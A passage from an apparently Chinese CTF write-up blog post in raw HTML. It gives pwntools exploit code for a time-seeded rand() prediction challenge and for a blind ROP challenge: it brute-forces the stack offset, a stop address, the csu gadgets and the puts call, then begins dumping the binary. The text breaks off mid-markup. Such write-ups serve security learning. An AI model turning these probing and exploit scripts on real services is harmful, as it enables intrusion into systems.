data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-49.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-703\"  sizes=\"auto, (max-width: 477px) 100vw, 477px\" \/><\/div><\/figure>\n\n\n\n<p>\u77f3\u5934\u526a\u5200\u5e03\u80dc\u5229\u6761\u4ef6 \u9700 return 1<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-50-1024x191.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"191\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-50-1024x191.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-704\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>exp:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import * &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <br>from ctypes import *<br>\u200b<br>libcc = CDLL(\"\/lib\/x86_64-linux-gnu\/libc.so.6\")<br>libcc.srand.argtypes = &#91;c_uint]<br>libcc.srand(libcc.time(0))<br>\u200b<br>io = remote(\"ctf.ctbu.edu.cn\",33134) &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br>\u200b<br>for i in range(100):<br> &nbsp; &nbsp;number = libcc.rand()<br> &nbsp; &nbsp;if number % 3 == 0:<br> &nbsp; &nbsp; &nbsp; &nbsp;io.sendlineafter(\"Paper):\",\"2\")<br> &nbsp; &nbsp;if number % 3 == 1:<br> &nbsp; &nbsp; &nbsp; &nbsp;io.sendlineafter(\"Paper):\",\"0\")<br> &nbsp; &nbsp;if number % 3 == 2:<br> &nbsp; &nbsp; &nbsp; &nbsp;io.sendlineafter(\"Paper):\",\"1\")<br>\u200b<br>io.interactive() &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">\u9ed1\u76d2\u6d4b\u8bd5<\/h3>\n\n\n\n<p>\u8003\u70b9\u662fBROP\uff0c\u901a\u8fc7\u6d4b\u504f\u79fb\u5e76\u628a\u9644\u4ef6dump\u4e0b\u6765\uff0c\u8fdb\u800c\u5229\u7528\u6f0f\u6d1egetshell\u7684\u4e00\u9053\u7ecf\u5178\u4f8b\u9898<\/p>\n\n\n\n<p>\u901a\u8fc7\u7a0b\u5e8f\u6d4b\u8bd5\uff0c\u53ef\u4ee5\u77e5\u9053\uff0c\u8f93\u5165\u77ed\u5b57\u7b26\u4e32\u548c\u957f\u5b57\u7b26\u4e32\u5f97\u5230\u7684\u7ed3\u679c\u662f\u4e0d\u4e00\u6837\u7684\uff0c\u7ed3\u5408\u9898\u76ee\u6240\u7ed9\u63d0\u793a\uff0c\u53ef\u4ee5\u770b\u5230\u662f\u6ca1\u6709canary\u7684<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Arch: &nbsp; &nbsp; &nbsp; amd64-64-little<br>RELRO: &nbsp; &nbsp;  Partial RELRO<br>Stack: &nbsp; &nbsp;  No canary found<br>NX: &nbsp; &nbsp; &nbsp; &nbsp; NX enabled<br>PIE: &nbsp; &nbsp; &nbsp;  No PIE (0x400000)<\/code><\/pre>\n\n\n\n<p>\u56e0\u6b64\u53ef\u4ee5\u63a8\u65ad\u7684\u662f\uff0c\u6709\u4e00\u4e2a\u51fd\u6570 (\u5047\u8bbe\u4e3amain) \u8c03\u7528\u4e86\u4e00\u4e2a\u51fd\u6570 (\u5047\u8bbe\u4e3avuln) \uff0cvuln\u51fd\u6570\u4e2d\u6709\u8f93\u5165\u51fd\u6570\uff0c\u8fc7\u957f\u7684\u5b57\u7b26\u4e32\u4f1a\u6ea2\u51fa\u4fee\u6539\u5230\u8fd4\u56de\u5730\u5740\u8fdb\u800c\u65e0\u6cd5\u6b63\u5e38\u8f93\u51fa &#8220;Okay, bye!&#8221; \uff0c\u53ef\u4ee5\u63a8\u65ad\u51faputs( &#8220;Okay, bye!&#8221;)\u662f\u5728main\u51fd\u6570\u4e2d\u7684<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-51.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"998\" height=\"414\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-51.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-705\"  sizes=\"auto, (max-width: 998px) 100vw, 998px\" \/><\/div><\/figure>\n\n\n\n<p>\u4e3a\u4ec0\u4e48\u662fputs\u51fd\u6570? \u56e0\u4e3a\u7f16\u8bd1\u5668\u4f1a\u81ea\u52a8\u4f18\u5316\u8f93\u51fa\u51fd\u6570<\/p>\n\n\n\n<p>\u5047\u8bbec\u8bed\u8a00\u7a0b\u5e8f\u4e2d\u7684\u8f93\u51fa\u51fd\u6570\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>printf(\"abc\\n\");<br>puts(\"cde\");<\/code><\/pre>\n\n\n\n<p>\u90a3\u4e48\u7f16\u8bd1\u5668\u4f1a\u81ea\u52a8\u4f18\u5316\u4e3a\uff0c<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>puts(\"abc\"); \/\/puts\u81ea\u5e26\u4e00\u4e2a\u6362\u884c\u7b26<br>puts(\"cde\");<\/code><\/pre>\n\n\n\n<p>\uff08\u5f53\u7136\u4e5f\u53ef\u80fd\u662fwrite\u51fd\u6570\uff0cwrite\u51fd\u6570\u76f8\u5bf9\u590d\u6742\u4e00\u70b9\uff0c\u4f46\u8fd8\u662f\u53ef\u4ee5\u505a\u7684\uff0c\u4f46\u662f\u9898\u76ee\u80af\u5b9a\u662f\u6309\u7b80\u5355\u7684\u6765\u5bf9\u5427\u3002\u3002\u3002\uff09<\/p>\n\n\n\n<p>\u800c\u4e14\u4e5f\u53ef\u4ee5\u5f97\u5230\u4e00\u4e2a\u4fe1\u606f\u662f\uff0c\u6c47\u7f16\u4ee3\u7801\u5927\u81f4\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>main:<br>    ...<br>    call &nbsp; &nbsp;vuln<br> &nbsp; &nbsp;mov &nbsp; &nbsp; edi, offset aOkayBye ; \"Okay, bye!\"<br> &nbsp; &nbsp;call &nbsp; &nbsp;_puts<br> &nbsp;  ...<\/code><\/pre>\n\n\n\n<p>\u6240\u4ee5\uff0c\u6211\u4eec\u7f16\u5199\u4e00\u4e2a\u51fd\u6570\u7528\u4e8e\u6d4b\u8bd5\u8f93\u5165\u5730\u5740\u4e0e\u8fd4\u56de\u5730\u5740\u7684\u8ddd\u79bb\uff0c\u6d4b\u8bd5\u8f93\u5165\u7684\u5b57\u7b26\u4e32\u7684\u957f\u5ea6\u5f97\u591a\u957f\u624d\u4f1a\u8986\u76d6\u5230\u8fd4\u56de\u5730\u5740<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>def get_buffer_size():<br>    for i in range(1,300):<br>        payload = b'a'*i<br>        buffer_size = len(payload)<br>        try:<br>            io = get_io()<br>            io.send(payload)<br>            io.recvuntil(b'Okay, bye!')<br>            io.close()<br>            log.info(\"bad: %d\" % buffer_size)<br>        except :<br>            io.close()<br>            log.info(\"buffer_size: %d\" % (buffer_size-1))<br>            return buffer_size-1<\/code><\/pre>\n\n\n\n<p>\u5f97\u5230\u504f\u79fb136<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-52.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"912\" height=\"339\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-52.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-706\"  sizes=\"auto, (max-width: 912px) 100vw, 912px\" \/><\/div><\/figure>\n\n\n\n<p>\u4e0b\u4e00\u6b65\uff0c\u6784\u9020payload\uff0c\u6d4b\u8bd5main\u51fd\u6570\u5927\u6982\u7684\u5730\u5740<\/p>\n\n\n\n<p>\u6211\u4eec\u77e5\u9053\u7684\u662f\uff0c\u5982\u679c\u5c06\u8fd4\u56de\u5730\u5740\u4fee\u6539\u4e3amain\u51fd\u6570\u7684\u8bdd\uff0c\u90a3\u4e48\uff0c\u7a0b\u5e8f\u5e76\u4e0d\u4f1a\u5f02\u5e38\u9000\u51fa\uff0c\u800c\u662f\u4f1a\u8fd4\u56demain\u51fd\u6570\uff0c\u76f8\u5f53\u4e8e\u91cd\u65b0\u6267\u884c\u4e00\u6b21\u7a0b\u5e8f\uff0c\u6240\u4ee5\uff0c\u901a\u8fc7\u7206\u7834\u7684\u65b9\u6cd5\uff0c\u4ece\u57fa\u57400x400000\u5904\u5f00\u59cb\u7206\u7834\uff0c\u6784\u9020payload\uff0c\u8bbe\u7f6eaddr\u4ece0x400000\u5f00\u59cb\u9012\u589e<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>payload = b'a' * buffer_size + p64(addr)<\/code><\/pre>\n\n\n\n<p>\u4f46\u662f\uff0c\u5982\u679c\u4f60\u81ea\u5df1\u53bb\u7f16\u8bd1\u4e00\u4e2ademo\u7a0b\u5e8f\u6765\u8f85\u52a9\u5224\u65ad\u504f\u79fb\u7684\u8bdd\uff0c\u53ef\u4ee5\u6781\u5927\u7684\u7f29\u77ed\u7206\u7834\u65f6\u95f4<\/p>\n\n\n\n<p>\u56e0\u6b64\uff0c\u6211\u9009\u53d6\u7684\u5730\u5740\u662f0x400500\uff0c\u8fd8\u6709\u4e00\u4e2a\u5c0f\u7ec6\u8282\u662f\uff0cstart\u51fd\u6570\u4e0emain\u51fd\u6570\u76f8\u6bd4\uff0cstart\u7684\u5730\u5740\u66f4\u4f4e\u4e00\u70b9\uff0c\u5982\u679c\u901a\u8fc7\u7a0b\u5e8f\u8fd4\u56de\u7684\u5b57\u7b26\u4e32 &#8220;Welcome to the BROP challenge!&#8221; \u6765\u5224\u65ad\u7a0b\u5e8f\u662f\u5426\u6210\u529f\u8fd4\u56demain\u51fd\u6570\u7684\u8bdd\uff0c\u504f\u5dee\u4f1a\u6bd4\u8f83\u5927\uff0c\u56e0\u4e3amain\u51fd\u6570\u662fstart\u51fd\u6570\u8c03\u7528\u7684\uff0c\u6267\u884c\u5230start\u51fd\u6570\u540c\u6837\u662f\u4f1a\u8fd4\u56demain\u51fd\u6570\u7684\uff0c\u8fd9\u6837\u7684\u8bdd\uff0cmain\u51fd\u6570\u7684\u8fd4\u56de\u5730\u5740\u5c31\u4e0d\u597d\u786e\u5b9a\uff0c\u8f93\u51fa\u51fd\u6570\u5982 call puts \u7684\u5730\u5740\u4e5f\u4e0d\u597d\u786e\u5b9a<\/p>\n\n\n\n<p>\u56e0\u6b64\u6211\u8fd9\u91cc\u9009\u5219&#8221;Okay, bye!&#8221; \u6765\u5224\u65ad\uff0c\u5e76\u8bbe\u7f6e\u4e00\u4e2a\u8d85\u65f6\u6765\u9632\u6b62\u7a0b\u5e8f\u5361\u5728read\u51fd\u6570\u91cc\uff0c\u8fd9\u6837\u7684\u8bdd\uff0c\u5c31\u80fd\u66f4\u7cbe\u51c6\u7684\u5f97\u5230main\u51fd\u6570\u7684\u5927\u6982\u5730\u5740\uff0c\u5373\u524d\u9762\u63d0\u5230\u7684<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>main:<br>\t...<br>\tcall    vuln<br>    mov     edi, offset aOkayBye ; \"Okay, bye!\"<br>    call    _puts<br>    ...<\/code><\/pre>\n\n\n\n<p>\u6240\u4ee5\u8fd9\u4e00\u6b65\u7684\u7206\u7834\u51fd\u6570\u4e3a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>def get_stop_addr(buffer_size):<br>    addr = 0x400500<br>    while True:<br>        addr += 1<br>        payload = b'a' * buffer_size + p64(addr)<br>        try:<br>            io = get_io()<br>            io.sendline(payload)<br>            response = io.recvuntil(b'Okay, bye!', timeout=2)<br>            if b'Okay, bye!' in response:<br>                io.close()<br>                log.info(\"stop address: 0x%x\" % addr)<br>                return addr<br>            else:<br>                io.close()<br>                log.info(\"bad: 0x%x - no message\" % addr)<br>        except Exception as e:<br>            try:<br>                io.close()<br>            except:<br>                pass<br>            log.info(\"bad: 0x%x - error: %s\" % (addr, str(e)))<\/code><\/pre>\n\n\n\n<p>\u5f97\u5230\u5730\u57400x4006c4<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-53.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"914\" height=\"342\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-53.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-707\"  sizes=\"auto, (max-width: 914px) 100vw, 914px\" \/><\/div><\/figure>\n\n\n\n<p>\u4e0b\u4e00\u6b65\uff0c\u5bfb\u627egadgets\uff0c\u8fd9\u4e00\u6b65\u6d89\u53ca\u5230ret2csu\u7684\u77e5\u8bc6\u70b9\uff0c\u5927\u81f4\u5982\u4e0b<\/p>\n\n\n\n<p>__libc_csu_init \u51fd\u6570\u5b58\u5728\u8fd9\u4e48\u4e00\u6bb5\u6c47\u7f16\u4ee3\u7801<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-54.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"261\" height=\"180\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-54.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-708\"\/><\/div><\/figure>\n\n\n\n<p>\u4ec0\u4e48\u610f\u601d\u5462\uff0c\u5c316\u4e2apop\u5457\uff0c\u8fd9\u91cc\u9762\u6709\u4ec0\u4e48\u5462<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>pop r15  -----&gt;  \"\\x41\\x5F\"<br>\u800c<br>pop rdi  -----&gt;  \"\\x5F\"<\/code><\/pre>\n\n\n\n<p>\u5c31\u662f\u8bf4\uff0c\u5982\u679c\u6211\u4eec\u80fd\u6d4b\u51fa\u8fd9\u4e00\u6bb5gadgets\u7684\u5730\u5740\uff0c\u90a3\u4e48\u5c31\u76f8\u5f53\u4e8e\u6211\u4eec\u77e5\u9053\u4e86pop_rdi\u7684\u5730\u5740\uff0c\u4ece\u800c\u53ef\u4ee5\u8bbe\u7f6eputs\u7684\u53c2\u6570<\/p>\n\n\n\n<p>\u5982\u4f55\u6d4b\uff1f\u76f8\u5f53\u4e8e\u6211\u4eec\u8981\u8ba9\u8fd9\u4e00\u6bb5gadgets\u53ef\u4ee5\u6b63\u5e38\u6267\u884c\uff0c\u6784\u9020payload\u5982\u4e0b\uff0c\u5982\u679c\u7a0b\u5e8f\u6210\u529f\u6267\u884c\u4e86\u8fd9\u4e00\u6761payload\uff0c\u7a0b\u5e8f\u5c06\u8f93\u51fa \u201cOkay, bye!\u201d<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">payload = b'a' * buffer_size + p64(addr) + p64(1)*6 + p64(stop_addr)<\/pre>\n\n\n\n<p>stop_addr\u5730\u5740\u5c31\u662f\u4e0a\u4e00\u4e2a\u51fd\u6570\u7206\u7834\u7684\u6765\u76840x4006c4<\/p>\n\n\n\n<p>addr\u4ece0x4006d0\u5f00\u59cb\u9012\u589e\uff0c\u4e3a\u4ec0\u4e48\u662f0x4006d0\uff1f\u56e0\u4e3a__libc_csu_init\u51fd\u6570\u662f\u5728\u6211\u4eec\u7f16\u5199\u7684\u51fd\u6570\u540e\u9762\u7684\uff0c\u4e5f\u5c31\u662f\u66f4\u9ad8\u7684\u5730\u5740\uff0c\u6240\u4ee5\u6211\u4eec\u5b8c\u5168\u53ef\u4ee5\u4ece0x4006c4\u7684\u540e\u9762\u5f00\u59cb\u6d4b\u8bd5\uff0c\u6240\u4ee5\u5c31\u968f\u4fbf\u9009\u4e86\u4e2a0x4006d0<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-44.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"507\" height=\"518\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-44.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-698\"  sizes=\"auto, (max-width: 507px) 100vw, 507px\" \/><\/div><\/figure>\n\n\n\n<p>\u6240\u4ee5\u7206\u7834gadgets\u7684\u51fd\u6570\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>def get_gadgets_addr(stop_addr, buffer_size):<br>    addr = 0x4006d0<br>    while True:<br>        addr += 1<br>        payload = b'a' * buffer_size + p64(addr) + p64(1)*6<br>        try:<br>            io = get_io()<br>            io.sendline(payload + p64(stop_addr))<br>            response = io.recvuntil(b'Okay, bye!', timeout=2)<br>            if b'Okay, bye!' in response:<br>                io.close()<br>                log.info(\"gadgets address: 0x%x\" % addr)<br>                return addr<br>            else:<br>                io.close()<br>                log.info(\"bad: 0x%x - no message\" % addr)<br>        except Exception as e:<br>            try:<br>                io.close()<br>            except:<br>                pass<br>            log.info(\"bad: 0x%x - error: %s\" % (addr, str(e)))<\/code><\/pre>\n\n\n\n<p>\u5f97\u5230gadgets\u7684\u5730\u5740\u4e3a0x40075a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-43.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"903\" height=\"372\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-43.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-697\"  sizes=\"auto, (max-width: 903px) 100vw, 903px\" \/><\/div><\/figure>\n\n\n\n<p>\u90a3\u4e48 pop rdi \u7684\u5730\u5740\u5c31\u7b49\u4e8e 0x40075a + 9\uff0cpop rdi \u7684\u5730\u5740\u77e5\u9053\u4e86\u63a5\u4e0b\u6765\u5c31\u662f\u6d4b\u8bd5call puts\u7684\u771f\u6b63\u5730\u5740\u4e86<\/p>\n\n\n\n<p>\u5bf9\u4e8e\u524d\u9762\u7684\u6c47\u7f16\u4ee3\u7801\uff0c\u6211\u4eec\u66f4\u591a\u7684\u53ea\u662f\u63a8\u6d4b\uff0c\u8981\u60f3\u5f97\u5230call puts \u7684\u771f\u6b63\u5730\u5740\uff0c\u8fd8\u9700\u8981\u6784\u9020\u7279\u5b9a\u8f93\u51fa\uff0c\u6211\u4eec\u77e5\u9053\uff0celf\u6587\u4ef6\u5f00\u5934\u7684\u56db\u4e2a\u5b57\u8282\u5fc5\u7136\u662f &#8220;\\x7fELF&#8221;<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-42-1024x154.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"154\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-42-1024x154.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-696\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u6211\u4eec\u8fd8\u77e5\u9053\u53ef\u4ee5\u8c03\u7528\u5230puts( &#8220;Okay, bye!&#8221;)\u7684\u5730\u5740\u4e3a0x4006c4\uff0c\u56e0\u6b64\uff0c\u6211\u4eec\u53ef\u4ee5\u4ece0x4006c4\u5f00\u59cb\u6d4b\u8bd5\uff0c\u6784\u9020payload<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>payload = b'a' * buffer_size + p64(gadget_addr + 9) + p64(0x400000) + p64(addr)<\/code><\/pre>\n\n\n\n<p>addr\u4ece0x4006c4\u5f00\u59cb\u9012\u589e\uff0c\u5982\u679caddr\u4e3acall puts\u7684\u5730\u5740\uff0c\u90a3\u4e48\u7a0b\u5e8f\u4f1a\u8f93\u51fa&#8221;\\x7fELF&#8221;<\/p>\n\n\n\n<p>\u6545\u7206\u7834\u51fd\u6570\u5982\u4e0b\uff0c\u8fd9\u4e00\u6b65\u662f\u6700\u5feb\u7684<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>def get_puts_call_addr(buffer_size, gadget_addr):<br>    addr = 0x4006c4<br>    while True:<br>        addr += 1<br>        payload = b'a' * buffer_size <br>        payload += p64(gadget_addr + 9) + p64(0x400000)<br>        payload += p64(addr)<br>        try:<br>            p = get_io()<br>            p.sendline(payload)<br>            p.recvuntil(b'\\x7fELF')<br>            log.info(\"puts address: 0x%x\" % addr)<br>            p.close()<br>            return addr<br>        except:<br>            p.close()<br>            log.info(\"bad: 0x%x\" % addr)<\/code><\/pre>\n\n\n\n<p>\u5f97\u5230call puts\u7684\u5730\u5740 0x4006c9<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-41.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"903\" height=\"345\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-41.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-695\"  sizes=\"auto, (max-width: 903px) 100vw, 903px\" \/><\/div><\/figure>\n\n\n\n<p>\u4e0b\u4e00\u6b65\uff0cpop_rdi\u5730\u5740\u6709\u4e86\uff0cputs\u5730\u5740\u4e5f\u6709\u4e86\uff0c\u63a5\u4e0b\u6765\u5c31\u662f\u628a\u7a0b\u5e8f\u4e00\u6bb5\u6bb5\u7684\u6253\u5370\u51fa\u6765\uff0c\u7ec4\u5408\u6210\u4e00\u4e2a\u4e8c\u8fdb\u5236\u6587\u4ef6<\/p>\n\n\n\n<p>\u6211\u4eec\u9009\u53d6\u7684\u6bb5\u662f0x400000-0x401000\uff0c\u56e0\u4e3aplt\u6bb5\u548ctext\u6bb5\u90fd\u662f\u5728\u8fd9\u4e2a\u6bb5\u91cc\u7684<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' 